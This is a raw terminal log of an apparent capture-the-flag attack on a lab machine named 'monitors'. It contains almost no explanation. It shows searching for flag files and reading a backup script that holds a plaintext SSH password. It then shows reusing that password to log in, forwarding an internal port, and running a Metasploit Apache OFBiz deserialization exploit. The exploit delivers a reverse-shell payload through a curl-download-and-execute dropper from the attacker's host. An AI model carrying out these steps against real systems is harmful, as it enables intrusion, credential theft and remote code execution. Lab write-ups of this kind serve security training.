www-data@monitors:/usr/share/cacti/cacti$ find / -name user.txt 2>/dev/null
/home/marcus/user.txt
www-data@monitors:/usr/share/cacti/cacti$ ls -la /home/marcus/user.txt
-r--r----- 1 root marcus 33 Sep 11 06:54 /home/marcus/user.txt
www-data@monitors:/home/marcus$ ls -la
total 40
drwxr-xr-x 5 marcus marcus 4096 Jan 25 2021 .
drwxr-xr-x 3 root root 4096 Nov 10 2020 ..
d--x--x--x 2 marcus marcus 4096 Nov 10 2020 .backup
lrwxrwxrwx 1 root root 9 Nov 10 2020 .bash_history -> /dev/null
-rw-r--r-- 1 marcus marcus 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 marcus marcus 3771 Apr 4 2018 .bashrc
drwx------ 2 marcus marcus 4096 Jan 25 2021 .cache
drwx------ 3 marcus marcus 4096 Nov 10 2020 .gnupg
www-data@monitors:/etc$ cat /home/marcus/.backup/backup.sh
#!/bin/bash
backup_name="cacti_backup"
config_pass="VerticalEdge2020"
zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip
www-data@monitors:/etc$ cat /home/marcus/.backup/backup.sh
#!/bin/bash
backup_name="cacti_backup"
config_pass="******************"
zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip
ssh [email protected]
The authenticity of host '10.10.10.238 (10.10.10.238)' can't be established.
ECDSA key fingerprint is SHA256:qcinAnoUyOFIv8VZ0yXCnFRNmzc6Zghh1VbQQD43abI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.238' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
marcus@monitors:~$ ifconfig
br-968a1c1855aa: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255
ether 02:42:57:73:aa:3e txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
marcus@monitors:~$ netstat -tulnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 '127.0.0.1:8443' 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
ssh -L 8443:127.0.0.1:8443 [email protected]
[email protected]'s password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Sep 11 07:21:21 UTC 2021
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lhost 10.10.14.225
lhost => 10.10.14.225
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lport 9001
lport => 9001
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set forceexploit true
forceexploit => true
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
[*] Started reverse TCP handler on 10.10.14.225:9001
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
[*] Executing Linux Dropper for linux/x64/shell/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/tz2phtuggSUl
[*] Local IP: http://192.168.0.105:8080/tz2phtuggSUl
[+] Successfully executed command: curl -so /tmp/XUuAnwnl http://10.10.14.225:8080/tz2phtuggSUl;chmod +x /tmp/XUuAnwnl;/tmp/XUuAnwnl;rm -f /tmp/XUuAnwnl
[*] Command Stager progress - 100.00% done (117/117 bytes)